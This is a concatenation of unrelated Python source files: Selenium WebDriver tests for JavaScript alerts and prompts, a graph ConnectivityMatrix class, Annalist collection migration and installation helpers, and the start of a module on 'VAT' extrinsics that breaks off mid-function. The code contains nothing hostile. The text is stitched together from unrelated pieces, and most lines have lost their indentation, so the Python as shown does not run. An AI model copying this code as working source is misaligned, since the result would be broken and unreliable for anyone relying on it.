if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="prompt").click()
alert = self._waitForAlert()
alert.send_keys("cheese")
alert.accept()
result = self.driver.find_element(by=By.ID, value="text").text
self.assertEqual("cheese", result)
def testSettingTheValueOfAnAlertThrows(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
        self.driver.find_element(By.ID, "alert").click()
alert = self._waitForAlert()
try:
            alert.send_keys("cheese")
            self.fail("Expected exception")
except ElementNotVisibleException:
pass
except InvalidElementStateException:
pass
finally:
alert.accept()
    def testAlertShouldNotAllowAdditionalCommandsIfDismissed(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
        self._loadPage("alerts")
self.driver.find_element(By.ID, "alert").click()
alert = self._waitForAlert()
alert.dismiss()
try:
alert.text
self.fail("Expected NoAlertPresentException")
except NoAlertPresentException:
pass
def testShouldAllowUsersToAcceptAnAlertInAFrame(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.switch_to.frame("iframeWithAlert")
self.driver.find_element_by_id("alertInFrame").click()
alert = self._waitForAlert()
alert.accept()
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowUsersToAcceptAnAlertInANestedFrame(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.switch_to.frame("iframeWithIframe")
self.driver.switch_to.frame("iframeWithAlert")
self.driver.find_element_by_id("alertInFrame").click()
alert = self._waitForAlert()
alert.accept()
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldThrowAnExceptionIfAnAlertHasNotBeenDealtWithAndDismissTheAlert(self):
pass
        # TODO(David): Complete this test
def testPromptShouldUseDefaultValueIfNoKeysSent(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "prompt-with-default").click()
alert = self._waitForAlert()
alert.accept()
txt = self.driver.find_element(By.ID, "text").text
self.assertEqual("This is a default value", txt)
def testPromptShouldHaveNullValueIfDismissed(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "prompt-with-default").click()
alert = self._waitForAlert()
alert.dismiss()
self.assertEqual("null", self.driver.find_element(By.ID, "text").text)
def testHandlesTwoAlertsFromOneInteraction(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "double-prompt").click()
alert1 = self._waitForAlert()
alert1.send_keys("brie")
alert1.accept()
alert2 = self._waitForAlert()
alert2.send_keys("cheddar")
        alert2.accept()
self.assertEqual(self.driver.find_element(By.ID, "text1").text, "brie")
self.assertEqual(self.driver.find_element(By.ID, "text2").text, "cheddar")
def testShouldHandleAlertOnPageLoad(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "open-page-with-onload-alert").click()
alert = self._waitForAlert()
value = alert.text
alert.accept()
        self.assertEqual("onload", value)
def testShouldAllowTheUserToGetTheTextOfAnAlert(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
value = alert.text
alert.accept()
self.assertEqual("cheese", value)
def testUnexpectedAlertPresentExceptionContainsAlertText(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
value = alert.text
try:
self._loadPage("simpleTest")
raise Exception("UnexpectedAlertPresentException should have been thrown")
except UnexpectedAlertPresentException as uape:
            self.assertEqual(value, uape.alert_text)
self.assertTrue(str(uape).startswith("Alert Text: %s" % value))
def _waitForAlert(self):
return WebDriverWait(self.driver, 3).until(EC.alert_is_present())
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
try:
# just in case a previous test left open an alert
            self.driver.switch_to.alert.dismiss()
        except Exception:
pass
self.driver.get(self._pageURL(name))
|
|
from . import utils
from .path import *
from .pathFinder import *
import copy
class ConnectivityMatrix:
def __init__(self, graph):
self._graph = graph
self._paths = []
self._nodes = []
self._initialMatrix = []
self._matrix = []
self._rowLabels = []
self._colLabels = []
self._sourcesCollapsed = False
self._targetsCollapsed = False
def _activateMatrix(self, nodes):
self._nodes = list(set(nodes))
for i in range(0, len(self._nodes)):
row = []
for j in range(0, len(self._nodes)):
row.append([])
self._matrix.append(row)
for node in self._nodes:
self._rowLabels.append(utils.getNodeId(node, self._graph))
self._colLabels.append(utils.getNodeId(node, self._graph))
def _addPathToMatrix(self, path):
source = path.nodes[0]
target = path.nodes[len(path.nodes) - 1]
assert source in self._nodes and target in self._nodes, 'Found a path that is not in matrix. WTF?'
self._paths.append(path)
sourceIndex = self._getNodeIndex(source)
targetIndex = self._getNodeIndex(target)
self._matrix[sourceIndex][targetIndex].append(len(self._paths) - 1)
def _getNodeIndex(self, node):
return self._nodes.index(node)
def _getPathAsIndexes(self, path):
pathIndexes = []
for i in range(0, len(path.nodes)):
pathIndexes.append(int(path.nodes[i].id))
if i < len(path.edges):
pathIndexes.append(int(path.edges[i].id))
return pathIndexes
def _getUsedColIndexes(self):
usedColIndexes = []
for i in range(0, len(self._matrix)):
row = self._matrix[i]
for j in range(0, len(row)):
col = row[j]
                if len(col) != 0 and j not in usedColIndexes:
usedColIndexes.append(j)
return usedColIndexes
def _getUsedRowIndexes(self):
usedRowIndexes = []
for i in range(0, len(self._matrix)):
row = self._matrix[i]
for j in range(0, len(row)):
col = row[j]
                if len(col) != 0 and i not in usedRowIndexes:
usedRowIndexes.append(i)
return usedRowIndexes
def activate(self, nodeConstraints, edgeConstraints):
"""
Create a connectivity matrix for the given path node and edge constraints.
        _matrix[i][j] holds indexes of paths from _nodes[i] to _nodes[j].
        The paths for these indexes can be found in _paths.
        :param nodeConstraints: list of node type regexes (sources first, targets last)
        :param edgeConstraints: list of edge type regexes
"""
# Matrix is N x N where N is the number of sources and targets.
sources = utils.getNodesByTypeRegex(nodeConstraints[0], self._graph)
targets = utils.getNodesByTypeRegex(nodeConstraints[len(nodeConstraints) - 1], self._graph)
nodes = sources + targets
self._activateMatrix(nodes)
# Find paths for each source. Shove them into the matrix.
for node in sources:
pathFinder = PathFinder(self._graph)
pathFinder.findRegexConstrainedPathsFromSource(node, edgeConstraints, nodeConstraints)
for path in pathFinder.valid:
self._addPathToMatrix(path)
# Cache the initial matrix.
self._initialMatrix = copy.deepcopy(self._matrix)
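    # A usage sketch (not part of the original class; relies on the utils and
    # PathFinder helpers exactly as imported above):
    #
    #     cm = ConnectivityMatrix(graph)
    #     cm.activate(nodeConstraints, edgeConstraints)
    #     cm.collapseSources()   # optional: merge rows that share a node type
    #     result = cm.getAsJsonObject(removeEmptyGridCells=True)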
def collapseSources(self):
"""
Updates _matrix s.t. all rows of the same label get collapsed to a single row.
"""
        if self._sourcesCollapsed:
            return
        self._sourcesCollapsed = True
sourceTypes = utils.getNodesTypes(self._nodes, self._graph)
newMatrix = []
newCols = []
for node in self._nodes:
newCols.append(utils.getNodeId(node, self._graph))
for sourceType in sourceTypes:
newRow = [[] for node in self._nodes]
for i in range(0, len(self._matrix)):
rowType = utils.getNodeType(self._nodes[i], self._graph)
row = self._matrix[i]
if rowType == sourceType:
for j in range(0, len(row)):
col = row[j]
if len(col) > 0:
newRow[j] += col
newMatrix.append(newRow)
self._matrix = copy.deepcopy(newMatrix)
self._colLabels = newCols
self._rowLabels = sourceTypes
def collapseTargets(self):
"""
Updates _matrix s.t. all cols of the same label get collapsed to a single col.
"""
if self._targetsCollapsed:
return
self._targetsCollapsed = True
targetTypes = utils.getNodesTypes(self._nodes, self._graph)
newMatrix = []
# Initialize newMatrix
for i in range(0, len(self._matrix)):
newRow = []
for j in range(0, len(targetTypes)):
newRow.append([])
newMatrix.append(newRow)
# Populate new matrix
for i in range(0, len(self._matrix)):
row = self._matrix[i]
for j in range(0, len(row)):
col = row[j]
if len(col) > 0:
colType = utils.getNodeType(self._nodes[j], self._graph)
colIndex = targetTypes.index(colType)
newMatrix[i][colIndex] += col
self._matrix = copy.deepcopy(newMatrix)
self._colLabels = targetTypes
def getAsJsonObject(self, removeEmptyGridCells=False, replaceCellIdsWithIndexes=False):
newMatrix = []
rowLabels = []
colLabels = []
if replaceCellIdsWithIndexes and (self._targetsCollapsed or self._sourcesCollapsed):
assert False, "Cannot replace ids with indexes if sources or targets are collapsed"
if removeEmptyGridCells:
usedRows = self._getUsedRowIndexes()
usedCols = self._getUsedColIndexes()
newMatrix = []
for i in range(0, len(usedRows)):
row = []
for j in range(0, len(usedCols)):
row.append([])
newMatrix.append(row)
for i in range(0, len(self._matrix)):
if i in usedRows:
newRowIndex = usedRows.index(i)
row = self._matrix[i]
for j in range(0, len(row)):
if j in usedCols:
newColIndex = usedCols.index(j)
col = row[j]
pathList = []
for k in range(0, len(col)):
pathList.append(self._getPathAsIndexes(self._paths[col[k]]))
newMatrix[newRowIndex][newColIndex] = pathList
for rowIndex in usedRows:
rowLabels.append(self._rowLabels[rowIndex])
for colIndex in usedCols:
colLabels.append(self._colLabels[colIndex])
else:
for row in self._matrix:
newRow = []
for col in row:
pathList = []
for k in range(0, len(col)):
pathList.append(self._getPathAsIndexes(self._paths[col[k]]))
newRow.append(pathList)
newMatrix.append(newRow)
rowLabels = self._rowLabels
colLabels = self._colLabels
if replaceCellIdsWithIndexes:
newRowLabels = []
for label in rowLabels:
newRowLabels.append(int(utils.getNodeById(int(label), self._graph).id))
rowLabels = newRowLabels
newColLabels = []
for label in colLabels:
newColLabels.append(int(utils.getNodeById(int(label), self._graph).id))
colLabels = newColLabels
jsonObject = {}
jsonObject['row_labels'] = rowLabels
jsonObject['col_labels'] = colLabels
jsonObject['matrix'] = newMatrix
return jsonObject
def getPathAt(self, index):
return self._paths[index]
def reset(self):
self._matrix = copy.deepcopy(self._initialMatrix)
self._rowLabels = []
self._colLabels = []
for node in self._nodes:
self._rowLabels.append(utils.getNodeId(node, self._graph))
self._colLabels.append(utils.getNodeId(node, self._graph))
self._targetsCollapsed = False
self._sourcesCollapsed = False
|
|
"""
Collection management and migration helpers
See also: documents/notes/schema-evolution-notes:
"""
from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
__author__ = "Graham Klyne ([email protected])"
__copyright__ = "Copyright 2016, G. Klyne"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import os
import sys
import logging
import subprocess
import importlib
import shutil
import datetime
log = logging.getLogger(__name__)
from annalist import layout
from annalist.identifiers import ANNAL, RDFS
from annalist.util import valid_id, extract_entity_id, make_type_entity_id
from annalist.collections_data import installable_collections
from annalist.models.site import Site
from annalist.models.collection import Collection
from annalist.models.recordtype import RecordType
from annalist.models.recordview import RecordView
from annalist.models.recordlist import RecordList
from annalist.models.recordfield import RecordField
from annalist.models.recordgroup import RecordGroup
from annalist.models.collectiondata import initialize_coll_data, copy_coll_data, migrate_coll_data
from . import am_errors
from .am_settings import (
am_get_settings, am_get_site_settings, am_get_site
)
from .am_getargvalue import getarg, getargvalue
# Collection access helpers
def get_settings_site(annroot, userhome, options):
"""
Get settings and site data based on command line options provided
returns:
(status, settings, site)
where 'settings' and/or 'site' are None if not found.
"""
status = am_errors.AM_SUCCESS
settings = am_get_settings(annroot, userhome, options)
site = None
if not settings:
print("Settings not found (%s)"%(options.configuration), file=sys.stderr)
status = am_errors.AM_NOSETTINGS
if status == am_errors.AM_SUCCESS:
sitesettings = am_get_site_settings(annroot, userhome, options)
if not sitesettings:
print("Site settings not found (%s)"%(options.configuration), file=sys.stderr)
status = am_errors.AM_NOSETTINGS
if status == am_errors.AM_SUCCESS:
site = am_get_site(sitesettings)
return (status, settings, site)
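# A usage sketch: this is the pattern each am_* command below starts with --
#
#     status, settings, site = get_settings_site(annroot, userhome, options)
#     if status != am_errors.AM_SUCCESS:
#         return status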
def coll_type(coll, type_id):
"""
Return identified type in collection, or None
"""
    return RecordType.load(coll, type_id, altscope="all")
def coll_types(coll):
"""
Return iterator over types in collection
"""
return coll.types()
def coll_view(coll, view_id):
"""
Return identified view in collection, or None
"""
return RecordView.load(coll, view_id, altscope="all")
def coll_views(coll):
"""
Return iterator over views in collection
"""
for fid in coll._children(RecordView, altscope="all"):
f = coll_view(coll, fid)
if f and f.get_id() != "_initial_values":
yield f
return
def coll_list(coll, list_id):
"""
Return identified list in collection, or None
"""
return RecordList.load(coll, list_id, altscope="all")
def coll_lists(coll):
"""
Return iterator over lists in collection
"""
for fid in coll._children(RecordList, altscope="all"):
f = coll_list(coll, fid)
if f and f.get_id() != "_initial_values":
yield f
return
def coll_field(coll, field_id):
"""
Return identified field in collection, or None
"""
return RecordField.load(coll, field_id, altscope="all")
def coll_fields(coll):
"""
Return iterator over fields in collection
"""
for fid in coll._children(RecordField, altscope="all"):
f = coll_field(coll, fid)
if f and f.get_id() != "_initial_values":
yield f
return
def coll_group(coll, group_id):
"""
Return identified group in collection, or None
"""
return RecordGroup.load(coll, group_id, altscope="all")
def coll_groups(coll):
"""
Return iterator over groups in collection
"""
for gid in coll._children(RecordGroup, altscope="all"):
g = coll_group(coll, gid)
if g and g.get_id() != "_initial_values":
yield g
return
# Common logic for View, List and Group field lists
def add_to_set(value, values):
"""
Add non-empty value to set of values
"""
if value:
values.add(value)
return values
def field_in_field_list(field_list, field_id, property_uri):
"""
Tests to see if field is referenced in field list
"""
for fref in field_list:
if ( (extract_entity_id(fref.get(ANNAL.CURIE.field_id, "")) == field_id) or
(fref.get(ANNAL.CURIE.property_uri, "") == property_uri) ):
return True
return False
def group_in_field_list(field_list, coll, group_ids):
"""
Tests to see if any of group ids are referenced in field list
"""
for fref in field_list:
fid = extract_entity_id(fref.get(ANNAL.CURIE.field_id, ""))
fdef = coll_field(coll, fid)
if fdef.get(ANNAL.CURIE.group_ref, "") in group_ids:
return True
return False
def types_using_field(coll, field_id, property_uri):
"""
Returns a list of type ids that may use a specified field or property URI
"""
type_ids = set()
type_uris = set()
group_ids = set()
# Look at field definition
f = coll_field(coll, field_id)
add_to_set(f.get(ANNAL.CURIE.field_entity_type, ""), type_uris)
# Look at groups that reference field
for g in coll_groups(coll):
if field_in_field_list(g[ANNAL.CURIE.group_fields], field_id, property_uri):
add_to_set(g.get_id(), group_ids)
add_to_set(extract_entity_id(g.get(ANNAL.CURIE.record_type, "")), type_uris)
# Look at views that reference field or groups
for v in coll_views(coll):
if ( field_in_field_list(v[ANNAL.CURIE.view_fields], field_id, property_uri) or
group_in_field_list(v[ANNAL.CURIE.view_fields], coll, group_ids) ):
add_to_set(extract_entity_id(v.get(ANNAL.CURIE.record_type, "")), type_uris)
# Look at lists that reference field or groups
for l in coll_lists(coll):
if ( field_in_field_list(l[ANNAL.CURIE.list_fields], field_id, property_uri) or
group_in_field_list(l[ANNAL.CURIE.list_fields], coll, group_ids) ):
add_to_set(extract_entity_id(l.get(ANNAL.CURIE.record_type, "")), type_uris)
add_to_set(extract_entity_id(l.get(ANNAL.CURIE.default_type, "")), type_uris)
# Collect type ids
for t in coll_types(coll):
type_uri = t.get(ANNAL.CURIE.uri, "")
supertype_uris = set( s[ANNAL.CURIE.supertype_uri] for s in t.get(ANNAL.CURIE.supertype_uris,[]) )
if (type_uri in type_uris) or (supertype_uris & type_uris):
add_to_set(t.get_id(), type_ids)
return type_ids
def compare_field_list(old_coll, new_coll, old_field_list, new_field_list, reporting_prefix):
"""
Report URI changes between fields lists as seen in group, view and list definitions
"""
old_len = len(old_field_list)
new_len = len(new_field_list)
if new_len != old_len:
print("* %s, field count changed from %d to %d"%(reporting_prefix, old_len, new_len))
for i in range(new_len):
for j in range(old_len):
# Look for field in old group.
# If not found, ignore it - we're looking for URI changes
# @@TODO: ... or are we?
new_f = new_field_list[i]
old_f = old_field_list[j]
field_id = extract_entity_id(new_f[ANNAL.CURIE.field_id])
if field_id == extract_entity_id(old_f[ANNAL.CURIE.field_id]):
# Field found - check for incompatible URI override
# Note that field definitions are already checked
old_uri = old_f.get(ANNAL.CURIE.property_uri, "")
new_uri = new_f.get(ANNAL.CURIE.property_uri, "")
if (not old_uri) and new_uri:
old_field = coll_field(old_coll, field_id)
old_uri = old_field[ANNAL.CURIE.property_uri]
if old_uri and (not new_uri):
new_field = coll_field(new_coll, field_id)
new_uri = new_field[ANNAL.CURIE.property_uri]
if old_uri != new_uri:
print(
"* %s, field %s, property URI changed from '%s' to '%s'"%
(reporting_prefix, field_id, old_uri, new_uri)
)
report_property_references(new_coll, old_uri, "URI '%s'"%(old_uri))
break
return
def report_property_references(coll, property_uri, reporting_prefix):
"""
Report all references to a specified property URI.
"""
# Reference from types
for t in coll_types(coll):
type_id = t.get_id()
alias_value_uris = [ a[ANNAL.CURIE.alias_source] for a in t.get(ANNAL.CURIE.field_aliases,[]) ]
if property_uri in alias_value_uris:
print("%s appears as an alias value of type '%s'"%(reporting_prefix, type_id))
# References from views
for v in coll_views(coll):
view_id = v.get_id()
report_property_references_in_field_list(
coll, property_uri, v[ANNAL.CURIE.view_fields],
reporting_prefix, "fields for view %s"%(view_id)
)
# References from lists
for l in coll_lists(coll):
list_id = l.get_id()
if property_uri in l.get(ANNAL.CURIE.list_entity_selector, ""):
print("%s appears in selector for list '%s'"%(reporting_prefix, list_id))
report_property_references_in_field_list(
            coll, property_uri, l[ANNAL.CURIE.list_fields],
reporting_prefix, "fields for list %s"%(list_id)
)
# References from fields
for f in coll_fields(coll):
field_id = f.get_id()
if property_uri == f.get(ANNAL.CURIE.property_uri, ""):
print("%s appears as property URI for field '%s'"%(reporting_prefix, field_id))
if property_uri in f.get(ANNAL.CURIE.field_ref_restriction, ""):
print("%s appears in value restriction for field '%s'"%(reporting_prefix, field_id))
# References from groups
for g in coll_groups(coll):
group_id = g.get_id()
report_property_references_in_field_list(
coll, property_uri, g[ANNAL.CURIE.group_fields],
reporting_prefix, "fields for group %s"%(group_id)
)
return
def report_property_references_in_field_list(
coll, property_uri, field_list,
reporting_prefix, reporting_suffix):
"""
Report occurrences of a property URI appearing in a field list.
"""
for f in field_list:
if property_uri == f.get(ANNAL.CURIE.property_uri, ""):
print("%s appears in %s"%(reporting_prefix, reporting_suffix))
return
def report_type_references(coll, type_uri, reporting_prefix):
"""
Report all references to a specified type URI.
"""
# Reference from types
for t in coll_types(coll):
type_id = t.get_id()
supertype_uris = [ u[ANNAL.CURIE.supertype_uri] for u in t.get(ANNAL.CURIE.supertype_uris,[]) ]
if type_uri in supertype_uris:
print("%s appears as a supertype of type '%s'"%(reporting_prefix, type_id))
# References from views
for v in coll_views(coll):
view_id = v.get_id()
if type_uri == v.get(ANNAL.CURIE.record_type, ""):
print("%s appears as entity type for view '%s'"%(reporting_prefix, view_id))
# References from lists
for l in coll_lists(coll):
list_id = l.get_id()
if type_uri == l.get(ANNAL.CURIE.record_type, ""):
print("%s appears as entity type for list '%s'"%(reporting_prefix, list_id))
if type_uri in l.get(ANNAL.CURIE.list_entity_selector, ""):
print("%s appears in selector for list '%s'"%(reporting_prefix, list_id))
# References from fields
for f in coll_fields(coll):
field_id = f.get_id()
if type_uri == f.get(ANNAL.CURIE.field_value_type, ""):
print("%s appears as value type for field '%s'"%(reporting_prefix, field_id))
if type_uri == f.get(ANNAL.CURIE.field_entity_type, ""):
print("%s appears as entity type for field '%s'"%(reporting_prefix, field_id))
if type_uri in f.get(ANNAL.CURIE.field_ref_restriction, ""):
print("%s appears in value restriction for field '%s'"%(reporting_prefix, field_id))
# References from groups
for g in coll_groups(coll):
group_id = g.get_id()
if type_uri == g.get(ANNAL.CURIE.record_type, ""):
print("%s appears as entity type for group %s"%(reporting_prefix, group_id))
return
# Migration helper functions
def am_migrationreport(annroot, userhome, options):
"""
Collection migration report helper
annalist_manager migrationreport old_coll new_coll
Generates a report of changes to data needed to match type and property
URI changes moving from old_coll to new_coll.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
if len(options.args) > 2:
print("Unexpected arguments for %s: (%s)"%(options.command, " ".join(options.args)), file=sys.stderr)
return am_errors.AM_UNEXPECTEDARGS
old_coll_id = getargvalue(getarg(options.args, 0), "Old collection Id: ")
old_coll = Collection.load(site, old_coll_id)
if not (old_coll and old_coll.get_values()):
print("Old collection not found: %s"%(old_coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
new_coll_id = getargvalue(getarg(options.args, 1), "New collection Id: ")
new_coll = Collection.load(site, new_coll_id)
if not (new_coll and new_coll.get_values()):
print("New collection not found: %s"%(new_coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
status = am_errors.AM_SUCCESS
print("# Migration report from collection '%s' to '%s' #"%(old_coll_id, new_coll_id))
print("")
# Scan and report on type URI changes
for new_type in coll_types(new_coll):
type_id = new_type.get_id()
old_type = old_coll.get_type(type_id)
if old_type:
old_uri = old_type[ANNAL.CURIE.uri]
new_uri = new_type[ANNAL.CURIE.uri]
if old_uri != new_uri:
print("* Type %s, URI changed from '%s' to '%s'"%(type_id, old_uri, new_uri))
supertype_uris = [ u[ANNAL.CURIE.supertype_uri] for u in new_type.get(ANNAL.CURIE.supertype_uris,[]) ]
if old_uri not in supertype_uris:
print(
" Consider adding supertype '%s' to type '%s' in collection '%s'"%
(old_uri, type_id, new_coll_id)
)
report_type_references(new_coll, old_uri, " URI '%s'"%(old_uri))
# Scan and report on property URI changes in field definitions
for new_field in coll_fields(new_coll):
field_id = new_field.get_id()
old_field = coll_field(old_coll, field_id)
if old_field:
old_uri = old_field[ANNAL.CURIE.property_uri]
new_uri = new_field[ANNAL.CURIE.property_uri]
if old_uri != new_uri:
print("* Field %s, property URI changed from '%s' to '%s'"%(field_id, old_uri, new_uri))
type_ids = types_using_field(new_coll, field_id, old_uri)
for tid in type_ids:
print(
" Consider adding property alias for '%s' to type %s in collection '%s'"%
(old_uri, tid, new_coll_id)
)
# Scan and report on property URI changes in group definitions
for new_group in coll_groups(new_coll):
group_id = new_group.get_id()
old_group = coll_group(old_coll, group_id)
if old_group:
compare_field_list(
old_coll, new_coll,
old_group[ANNAL.CURIE.group_fields],
new_group[ANNAL.CURIE.group_fields],
"Group %s"%group_id)
# Scan and report on property URI changes in view definitions
for new_view in coll_views(new_coll):
view_id = new_view.get_id()
old_view = coll_view(old_coll, view_id)
if old_view:
compare_field_list(
old_coll, new_coll,
old_view[ANNAL.CURIE.view_fields],
new_view[ANNAL.CURIE.view_fields],
"View %s"%view_id)
# Scan and report on property URI changes in list definitions
for new_list in coll_lists(new_coll):
list_id = new_list.get_id()
old_list = coll_list(old_coll, list_id)
if old_list:
compare_field_list(
old_coll, new_coll,
old_list[ANNAL.CURIE.list_fields],
new_list[ANNAL.CURIE.list_fields],
"List %s"%list_id)
print("")
return status
# Collection management functions
def am_installcollection(annroot, userhome, options):
"""
Install software-defined collection data
annalist_manager installcollection coll_id
Copies data from an existing collection to a new collection.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
if len(options.args) > 1:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
# Check collection Id
coll_id = getargvalue(getarg(options.args, 0), "Collection Id to install: ")
if coll_id in installable_collections:
src_dir_name = installable_collections[coll_id]['data_dir']
else:
print("Collection name to install not known: %s"%(coll_id), file=sys.stderr)
print("Available collection Ids are: %s"%(",".join(installable_collections.keys())))
return am_errors.AM_NOCOLLECTION
    # Check if collection already exists
coll = Collection.load(site, coll_id)
if (coll and coll.get_values()):
if options.force:
print("Existing collection %s will be removed ('--force' specified)"%(coll_id), file=sys.stderr)
Collection.remove(site, coll_id)
else:
print("Collection already exists: %s"%(coll_id), file=sys.stderr)
return am_errors.AM_COLLECTIONEXISTS
# Install collection now
src_dir = os.path.join(annroot, "annalist/data", src_dir_name)
print("Installing collection '%s' from data directory '%s'"%(coll_id, src_dir))
coll_metadata = installable_collections[coll_id]['coll_meta']
date_time_now = datetime.datetime.now().replace(microsecond=0)
coll_metadata[ANNAL.CURIE.comment] = (
"Initialized at %s by `annalist-manager installcollection`"%
date_time_now.isoformat()
)
coll = site.add_collection(coll_id, coll_metadata)
msgs = initialize_coll_data(src_dir, coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_INSTALLCOLLFAIL
return status
def am_copycollection(annroot, userhome, options):
"""
Copy collection data
annalist_manager copycollection old_coll_id new_coll_id
Copies data from an existing collection to a new collection.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
if len(options.args) > 2:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
old_coll_id = getargvalue(getarg(options.args, 0), "Old collection Id: ")
old_coll = Collection.load(site, old_coll_id)
if not (old_coll and old_coll.get_values()):
print("Old collection not found: %s"%(old_coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
new_coll_id = getargvalue(getarg(options.args, 1), "New collection Id: ")
new_coll = Collection.load(site, new_coll_id)
if (new_coll and new_coll.get_values()):
print("New collection already exists: %s"%(new_coll_id), file=sys.stderr)
return am_errors.AM_COLLECTIONEXISTS
# Copy collection now
print("Copying collection '%s' to '%s'"%(old_coll_id, new_coll_id))
new_coll = site.add_collection(new_coll_id, old_coll.get_values())
msgs = copy_coll_data(old_coll, new_coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_COPYCOLLFAIL
print("")
return status
def am_check_site_updated(coll):
"""
    Check that site data has been updated before performing data migration.
    Data migration is performed incompletely if the "_field" type is not visible, so
that is the test used here.
"""
if layout.FIELD_TYPEID in coll._children(RecordType, altscope="all"):
return am_errors.AM_SUCCESS
print("Perform 'annalist-manager updatesitedata' before collection data migration.")
print("Collection data not migrated.")
return am_errors.AM_MIGRATECOLLFAIL
def am_migratecollection(annroot, userhome, options):
"""
Apply migrations for a specified collection
annalist_manager migratecollection coll
Reads and writes every entity in a collection, thereby applying data
migrations and saving them in the stored data.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
coll_id = getargvalue(getarg(options.args, 0), "Collection Id: ")
coll = Collection.load(site, coll_id)
if not (coll and coll.get_values()):
print("Collection not found: %s"%(coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
status = am_check_site_updated(coll)
if status != am_errors.AM_SUCCESS:
return status
print("Apply data migrations in collection '%s'"%(coll_id,))
msgs = migrate_coll_data(coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_MIGRATECOLLFAIL
else:
coll.update_software_compatibility_version()
return status
def am_migrateallcollections(annroot, userhome, options):
"""
Apply migrations to all collections
annalist_manager migrateallcollections
Reads and writes every entity in all collections, thereby
applying data migrations and saving them in the stored data.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
print("Apply data migrations in all collections:")
for coll in site.collections():
status = am_check_site_updated(coll)
if status != am_errors.AM_SUCCESS:
return status
coll_id = coll.get_id()
if coll_id != layout.SITEDATA_ID:
log.debug("========== Processing '%s' =========="%(coll_id,))
print("---- Processing '%s'"%(coll_id,))
msgs = migrate_coll_data(coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_MIGRATECOLLFAIL
print("Data migrations complete.")
return status
# End.
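# Illustrative usage sketch (not part of this module). The commands documented
# in the docstrings above would typically be run in this order; the collection
# ids shown are placeholders, not actual installable collection names.
#
#   annalist-manager installcollection <coll_id>
#   annalist-manager copycollection <old_coll_id> <new_coll_id>
#   annalist-manager updatesitedata
#   annalist-manager migratecollection <coll_id>
#   annalist-manager migrateallcollections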
|
|
from base import *
from globs import *
from types_builtin import app_map, subst
# Sure could use graphs here!
VatContents = DT('VatContents', ('copiedExtrinsics', ['*Extrinsic']),
('replacements', {'a': 'a'}),
('transmute', {'a': 'a'}))
VAT = new_env('VAT', VatContents)
Original = new_extrinsic('Original', 'a')
def set_orig(clone, orig):
# Don't need to recurse since there's only one level of clones
if has_extrinsic(Original, orig):
orig = extrinsic(Original, orig)
add_extrinsic(Original, clone, orig)
def orig_loc(obj):
